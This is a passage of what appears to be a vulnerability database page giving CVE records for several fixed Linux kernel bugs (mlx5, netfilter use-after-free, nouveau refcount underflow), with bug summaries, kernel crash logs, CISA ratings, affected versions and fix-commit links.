"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1ba9856cf7f6492b47c1edf853137f320d583db5"
},
{
"url": "https://git.kernel.org/stable/c/99b642dac24f6d09ba3ebf1d690be8aefff86164"
},
{
"url": "https://git.kernel.org/stable/c/b1173d64edd276c957b6d09e1f971c85b38f1519"
},
{
"url": "https://git.kernel.org/stable/c/5080808c3339de2220c602ab7c7fa23dc6c1a5a3"
}
],
"title": "ASoC: amd: Adjust error handling in case of absent codec device",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43818",
"datePublished": "2024-08-17T09:21:40.341Z",
"dateReserved": "2024-08-17T09:11:59.271Z",
"dateUpdated": "2025-05-04T09:26:56.750Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48884 (GCVE-0-2022-48884)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: Fix command stats access after free
Command may fail while driver is reloading and can't accept FW commands
till command interface is reinitialized. Such command failure is being
logged to command stats. This results in NULL pointer access as command
stats structure is being freed and reallocated during mlx5 devlink
reload (see kernel log below).
Fix it by making command stats statically allocated on driver probe.
Kernel log:
[ 2394.808802] BUG: unable to handle kernel paging request at 000000000002a9c0
[ 2394.810610] PGD 0 P4D 0
[ 2394.811811] Oops: 0002 [#1] SMP NOPTI
...
[ 2394.815482] RIP: 0010:native_queued_spin_lock_slowpath+0x183/0x1d0
...
[ 2394.829505] Call Trace:
[ 2394.830667] _raw_spin_lock_irq+0x23/0x26
[ 2394.831858] cmd_status_err+0x55/0x110 [mlx5_core]
[ 2394.833020] mlx5_access_reg+0xe7/0x150 [mlx5_core]
[ 2394.834175] mlx5_query_port_ptys+0x78/0xa0 [mlx5_core]
[ 2394.835337] mlx5e_ethtool_get_link_ksettings+0x74/0x590 [mlx5_core]
[ 2394.836454] ? kmem_cache_alloc_trace+0x140/0x1c0
[ 2394.837562] __rh_call_get_link_ksettings+0x33/0x100
[ 2394.838663] ? __rtnl_unlock+0x25/0x50
[ 2394.839755] __ethtool_get_link_ksettings+0x72/0x150
[ 2394.840862] duplex_show+0x6e/0xc0
[ 2394.841963] dev_attr_show+0x1c/0x40
[ 2394.843048] sysfs_kf_seq_show+0x9b/0x100
[ 2394.844123] seq_read+0x153/0x410
[ 2394.845187] vfs_read+0x91/0x140
[ 2394.846226] ksys_read+0x4f/0xb0
[ 2394.847234] do_syscall_64+0x5b/0x1a0
[ 2394.848228] entry_SYSCALL_64_after_hwframe+0x65/0xca
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48884",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:45.615051Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:52.151Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/cmd.c",
"include/linux/mlx5/driver.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ddf458641a511e7dff19f3bf0cbbc5dd9fe08ce5",
"status": "affected",
"version": "34f46ae0d4b38e83cfb26fb6f06b5b5efea47fdc",
"versionType": "git"
},
{
"lessThan": "da2e552b469a0cd130ff70a88ccc4139da428a65",
"status": "affected",
"version": "34f46ae0d4b38e83cfb26fb6f06b5b5efea47fdc",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/cmd.c",
"include/linux/mlx5/driver.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.18"
},
{
"lessThan": "5.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Fix command stats access after free\n\nCommand may fail while driver is reloading and can\u0027t accept FW commands\ntill command interface is reinitialized. Such command failure is being\nlogged to command stats. This results in NULL pointer access as command\nstats structure is being freed and reallocated during mlx5 devlink\nreload (see kernel log below).\n\nFix it by making command stats statically allocated on driver probe.\n\nKernel log:\n[ 2394.808802] BUG: unable to handle kernel paging request at 000000000002a9c0\n[ 2394.810610] PGD 0 P4D 0\n[ 2394.811811] Oops: 0002 [#1] SMP NOPTI\n...\n[ 2394.815482] RIP: 0010:native_queued_spin_lock_slowpath+0x183/0x1d0\n...\n[ 2394.829505] Call Trace:\n[ 2394.830667] _raw_spin_lock_irq+0x23/0x26\n[ 2394.831858] cmd_status_err+0x55/0x110 [mlx5_core]\n[ 2394.833020] mlx5_access_reg+0xe7/0x150 [mlx5_core]\n[ 2394.834175] mlx5_query_port_ptys+0x78/0xa0 [mlx5_core]\n[ 2394.835337] mlx5e_ethtool_get_link_ksettings+0x74/0x590 [mlx5_core]\n[ 2394.836454] ? kmem_cache_alloc_trace+0x140/0x1c0\n[ 2394.837562] __rh_call_get_link_ksettings+0x33/0x100\n[ 2394.838663] ? __rtnl_unlock+0x25/0x50\n[ 2394.839755] __ethtool_get_link_ksettings+0x72/0x150\n[ 2394.840862] duplex_show+0x6e/0xc0\n[ 2394.841963] dev_attr_show+0x1c/0x40\n[ 2394.843048] sysfs_kf_seq_show+0x9b/0x100\n[ 2394.844123] seq_read+0x153/0x410\n[ 2394.845187] vfs_read+0x91/0x140\n[ 2394.846226] ksys_read+0x4f/0xb0\n[ 2394.847234] do_syscall_64+0x5b/0x1a0\n[ 2394.848228] entry_SYSCALL_64_after_hwframe+0x65/0xca"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:27.061Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ddf458641a511e7dff19f3bf0cbbc5dd9fe08ce5"
},
{
"url": "https://git.kernel.org/stable/c/da2e552b469a0cd130ff70a88ccc4139da428a65"
}
],
"title": "net/mlx5: Fix command stats access after free",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48884",
"datePublished": "2024-08-21T06:10:15.857Z",
"dateReserved": "2024-07-16T11:38:08.925Z",
"dateUpdated": "2025-05-04T08:25:27.061Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48912 (GCVE-0-2022-48912)
Vulnerability from cvelistv5
Published
2024-08-22 01:31
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: fix use-after-free in __nf_register_net_hook()
We must not dereference @new_hooks after nf_hook_mutex has been released,
because other threads might have freed our allocated hooks already.
BUG: KASAN: use-after-free in nf_hook_entries_get_hook_ops include/linux/netfilter.h:130 [inline]
BUG: KASAN: use-after-free in hooks_validate net/netfilter/core.c:171 [inline]
BUG: KASAN: use-after-free in __nf_register_net_hook+0x77a/0x820 net/netfilter/core.c:438
Read of size 2 at addr ffff88801c1a8000 by task syz-executor237/4430
CPU: 1 PID: 4430 Comm: syz-executor237 Not tainted 5.17.0-rc5-syzkaller-00306-g2293be58d6a1 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106
print_address_description.constprop.0.cold+0x8d/0x336 mm/kasan/report.c:255
__kasan_report mm/kasan/report.c:442 [inline]
kasan_report.cold+0x83/0xdf mm/kasan/report.c:459
nf_hook_entries_get_hook_ops include/linux/netfilter.h:130 [inline]
hooks_validate net/netfilter/core.c:171 [inline]
__nf_register_net_hook+0x77a/0x820 net/netfilter/core.c:438
nf_register_net_hook+0x114/0x170 net/netfilter/core.c:571
nf_register_net_hooks+0x59/0xc0 net/netfilter/core.c:587
nf_synproxy_ipv6_init+0x85/0xe0 net/netfilter/nf_synproxy_core.c:1218
synproxy_tg6_check+0x30d/0x560 net/ipv6/netfilter/ip6t_SYNPROXY.c:81
xt_check_target+0x26c/0x9e0 net/netfilter/x_tables.c:1038
check_target net/ipv6/netfilter/ip6_tables.c:530 [inline]
find_check_entry.constprop.0+0x7f1/0x9e0 net/ipv6/netfilter/ip6_tables.c:573
translate_table+0xc8b/0x1750 net/ipv6/netfilter/ip6_tables.c:735
do_replace net/ipv6/netfilter/ip6_tables.c:1153 [inline]
do_ip6t_set_ctl+0x56e/0xb90 net/ipv6/netfilter/ip6_tables.c:1639
nf_setsockopt+0x83/0xe0 net/netfilter/nf_sockopt.c:101
ipv6_setsockopt+0x122/0x180 net/ipv6/ipv6_sockglue.c:1024
rawv6_setsockopt+0xd3/0x6a0 net/ipv6/raw.c:1084
__sys_setsockopt+0x2db/0x610 net/socket.c:2180
__do_sys_setsockopt net/socket.c:2191 [inline]
__se_sys_setsockopt net/socket.c:2188 [inline]
__x64_sys_setsockopt+0xba/0x150 net/socket.c:2188
do_syscall_x64 arch/x86/entry/common.c:50 [inline]
do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x7f65a1ace7d9
Code: 28 00 00 00 75 05 48 83 c4 28 c3 e8 71 15 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f65a1a7f308 EFLAGS: 00000246 ORIG_RAX: 0000000000000036
RAX: ffffffffffffffda RBX: 0000000000000006 RCX: 00007f65a1ace7d9
RDX: 0000000000000040 RSI: 0000000000000029 RDI: 0000000000000003
RBP: 00007f65a1b574c8 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000020000000 R11: 0000000000000246 R12: 00007f65a1b55130
R13: 00007f65a1b574c0 R14: 00007f65a1b24090 R15: 0000000000022000
</TASK>
The buggy address belongs to the page:
page:ffffea0000706a00 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x1c1a8
flags: 0xfff00000000000(node=0|zone=1|lastcpupid=0x7ff)
raw: 00fff00000000000 ffffea0001c1b108 ffffea000046dd08 0000000000000000
raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000
page dumped because: kasan: bad access detected
page_owner tracks the page as freed
page last allocated via order 2, migratetype Unmovable, gfp_mask 0x52dc0(GFP_KERNEL|__GFP_NOWARN|__GFP_NORETRY|__GFP_COMP|__GFP_ZERO), pid 4430, ts 1061781545818, free_ts 1061791488993
prep_new_page mm/page_alloc.c:2434 [inline]
get_page_from_freelist+0xa72/0x2f50 mm/page_alloc.c:4165
__alloc_pages+0x1b2/0x500 mm/page_alloc.c:5389
__alloc_pages_node include/linux/gfp.h:572 [inline]
alloc_pages_node include/linux/gfp.h:595 [inline]
kmalloc_large_node+0x62/0x130 mm/slub.c:4438
__kmalloc_node+0x35a/0x4a0 mm/slub.
---truncated---
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2420b79f8c18a75ee2417cace381f4604b9b4365 Version: 2420b79f8c18a75ee2417cace381f4604b9b4365 Version: 2420b79f8c18a75ee2417cace381f4604b9b4365 Version: 2420b79f8c18a75ee2417cace381f4604b9b4365 Version: 2420b79f8c18a75ee2417cace381f4604b9b4365 Version: 2420b79f8c18a75ee2417cace381f4604b9b4365 Version: 2420b79f8c18a75ee2417cace381f4604b9b4365 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48912",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:57.260667Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:01.872Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "05f7927b25d2635e87267ff6c79db79fb46cf313",
"status": "affected",
"version": "2420b79f8c18a75ee2417cace381f4604b9b4365",
"versionType": "git"
},
{
"lessThan": "bdd8fc1b826e6f23963f5bef3f7431c6188ec954",
"status": "affected",
"version": "2420b79f8c18a75ee2417cace381f4604b9b4365",
"versionType": "git"
},
{
"lessThan": "49c24579cec41e32f13d57b337fd28fb208d4a5b",
"status": "affected",
"version": "2420b79f8c18a75ee2417cace381f4604b9b4365",
"versionType": "git"
},
{
"lessThan": "8b0142c4143c1ca297dcf2c0cdd045d65dae2344",
"status": "affected",
"version": "2420b79f8c18a75ee2417cace381f4604b9b4365",
"versionType": "git"
},
{
"lessThan": "bd61f192a339b1095dfd6d56073a5265934c2979",
"status": "affected",
"version": "2420b79f8c18a75ee2417cace381f4604b9b4365",
"versionType": "git"
},
{
"lessThan": "5a8076e98dde17224dd47283b894a8b1dbe1bc72",
"status": "affected",
"version": "2420b79f8c18a75ee2417cace381f4604b9b4365",
"versionType": "git"
},
{
"lessThan": "56763f12b0f02706576a088e85ef856deacc98a0",
"status": "affected",
"version": "2420b79f8c18a75ee2417cace381f4604b9b4365",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.14.*",
"status": "unaffected",
"version": "4.14.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.233",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.183",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.14.270",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.233",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.183",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.104",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: fix use-after-free in __nf_register_net_hook()\n\nWe must not dereference @new_hooks after nf_hook_mutex has been released,\nbecause other threads might have freed our allocated hooks already.\n\nBUG: KASAN: use-after-free in nf_hook_entries_get_hook_ops include/linux/netfilter.h:130 [inline]\nBUG: KASAN: use-after-free in hooks_validate net/netfilter/core.c:171 [inline]\nBUG: KASAN: use-after-free in __nf_register_net_hook+0x77a/0x820 net/netfilter/core.c:438\nRead of size 2 at addr ffff88801c1a8000 by task syz-executor237/4430\n\nCPU: 1 PID: 4430 Comm: syz-executor237 Not tainted 5.17.0-rc5-syzkaller-00306-g2293be58d6a1 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106\n print_address_description.constprop.0.cold+0x8d/0x336 mm/kasan/report.c:255\n __kasan_report mm/kasan/report.c:442 [inline]\n kasan_report.cold+0x83/0xdf mm/kasan/report.c:459\n nf_hook_entries_get_hook_ops include/linux/netfilter.h:130 [inline]\n hooks_validate net/netfilter/core.c:171 [inline]\n __nf_register_net_hook+0x77a/0x820 net/netfilter/core.c:438\n nf_register_net_hook+0x114/0x170 net/netfilter/core.c:571\n nf_register_net_hooks+0x59/0xc0 net/netfilter/core.c:587\n nf_synproxy_ipv6_init+0x85/0xe0 net/netfilter/nf_synproxy_core.c:1218\n synproxy_tg6_check+0x30d/0x560 net/ipv6/netfilter/ip6t_SYNPROXY.c:81\n xt_check_target+0x26c/0x9e0 net/netfilter/x_tables.c:1038\n check_target net/ipv6/netfilter/ip6_tables.c:530 [inline]\n find_check_entry.constprop.0+0x7f1/0x9e0 net/ipv6/netfilter/ip6_tables.c:573\n translate_table+0xc8b/0x1750 net/ipv6/netfilter/ip6_tables.c:735\n do_replace net/ipv6/netfilter/ip6_tables.c:1153 [inline]\n do_ip6t_set_ctl+0x56e/0xb90 net/ipv6/netfilter/ip6_tables.c:1639\n nf_setsockopt+0x83/0xe0 net/netfilter/nf_sockopt.c:101\n ipv6_setsockopt+0x122/0x180 net/ipv6/ipv6_sockglue.c:1024\n rawv6_setsockopt+0xd3/0x6a0 net/ipv6/raw.c:1084\n __sys_setsockopt+0x2db/0x610 net/socket.c:2180\n __do_sys_setsockopt net/socket.c:2191 [inline]\n __se_sys_setsockopt net/socket.c:2188 [inline]\n __x64_sys_setsockopt+0xba/0x150 net/socket.c:2188\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f65a1ace7d9\nCode: 28 00 00 00 75 05 48 83 c4 28 c3 e8 71 15 00 00 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007f65a1a7f308 EFLAGS: 00000246 ORIG_RAX: 0000000000000036\nRAX: ffffffffffffffda RBX: 0000000000000006 RCX: 00007f65a1ace7d9\nRDX: 0000000000000040 RSI: 0000000000000029 RDI: 0000000000000003\nRBP: 00007f65a1b574c8 R08: 0000000000000001 R09: 0000000000000000\nR10: 0000000020000000 R11: 0000000000000246 R12: 00007f65a1b55130\nR13: 00007f65a1b574c0 R14: 00007f65a1b24090 R15: 0000000000022000\n \u003c/TASK\u003e\n\nThe buggy address belongs to the page:\npage:ffffea0000706a00 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x1c1a8\nflags: 0xfff00000000000(node=0|zone=1|lastcpupid=0x7ff)\nraw: 00fff00000000000 ffffea0001c1b108 ffffea000046dd08 0000000000000000\nraw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\npage_owner tracks the page as freed\npage last allocated via order 2, migratetype Unmovable, gfp_mask 0x52dc0(GFP_KERNEL|__GFP_NOWARN|__GFP_NORETRY|__GFP_COMP|__GFP_ZERO), pid 4430, ts 1061781545818, free_ts 1061791488993\n prep_new_page mm/page_alloc.c:2434 [inline]\n get_page_from_freelist+0xa72/0x2f50 mm/page_alloc.c:4165\n __alloc_pages+0x1b2/0x500 mm/page_alloc.c:5389\n __alloc_pages_node include/linux/gfp.h:572 [inline]\n alloc_pages_node include/linux/gfp.h:595 [inline]\n kmalloc_large_node+0x62/0x130 mm/slub.c:4438\n __kmalloc_node+0x35a/0x4a0 mm/slub.\n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:58.127Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/05f7927b25d2635e87267ff6c79db79fb46cf313"
},
{
"url": "https://git.kernel.org/stable/c/bdd8fc1b826e6f23963f5bef3f7431c6188ec954"
},
{
"url": "https://git.kernel.org/stable/c/49c24579cec41e32f13d57b337fd28fb208d4a5b"
},
{
"url": "https://git.kernel.org/stable/c/8b0142c4143c1ca297dcf2c0cdd045d65dae2344"
},
{
"url": "https://git.kernel.org/stable/c/bd61f192a339b1095dfd6d56073a5265934c2979"
},
{
"url": "https://git.kernel.org/stable/c/5a8076e98dde17224dd47283b894a8b1dbe1bc72"
},
{
"url": "https://git.kernel.org/stable/c/56763f12b0f02706576a088e85ef856deacc98a0"
}
],
"title": "netfilter: fix use-after-free in __nf_register_net_hook()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48912",
"datePublished": "2024-08-22T01:31:25.620Z",
"dateReserved": "2024-08-21T06:06:23.294Z",
"dateUpdated": "2025-05-04T08:25:58.127Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43867 (GCVE-0-2024-43867)
Vulnerability from cvelistv5
Published
2024-08-20 23:50
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/nouveau: prime: fix refcount underflow
Calling nouveau_bo_ref() on a nouveau_bo without initializing it (and
hence the backing ttm_bo) leads to a refcount underflow.
Instead of calling nouveau_bo_ref() in the unwind path of
drm_gem_object_init(), clean things up manually.
(cherry picked from commit 1b93f3e89d03cfc576636e195466a0d728ad8de5)
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6 Version: ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6 Version: ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6 Version: ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6 Version: ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6 Version: ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6 Version: ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43867",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:06:32.667012Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:19.112Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/nouveau_prime.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3bcb8bba72ce89667fa863054956267c450c47ef",
"status": "affected",
"version": "ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6",
"versionType": "git"
},
{
"lessThan": "906372e753c5027a1dc88743843b6aa2ad1aaecf",
"status": "affected",
"version": "ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6",
"versionType": "git"
},
{
"lessThan": "16998763c62bb465ebc409d0373b9cdcef1a61a6",
"status": "affected",
"version": "ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6",
"versionType": "git"
},
{
"lessThan": "ebebba4d357b6c67f96776a48ddbaf0060fa4c10",
"status": "affected",
"version": "ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6",
"versionType": "git"
},
{
"lessThan": "f23cd66933fe76b84d8e282e5606b4d99068c320",
"status": "affected",
"version": "ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6",
"versionType": "git"
},
{
"lessThan": "2a1b327d57a8ac080977633a18999f032d7e9e3f",
"status": "affected",
"version": "ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6",
"versionType": "git"
},
{
"lessThan": "a9bf3efc33f1fbf88787a277f7349459283c9b95",
"status": "affected",
"version": "ab9ccb96a6e6f95bcde6b8b2a524370efdbfdcd6",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/nouveau/nouveau_prime.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.9"
},
{
"lessThan": "3.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.45",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.104",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.45",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.4",
"versionStartIncluding": "3.9",
"vulnerable": true
},
{
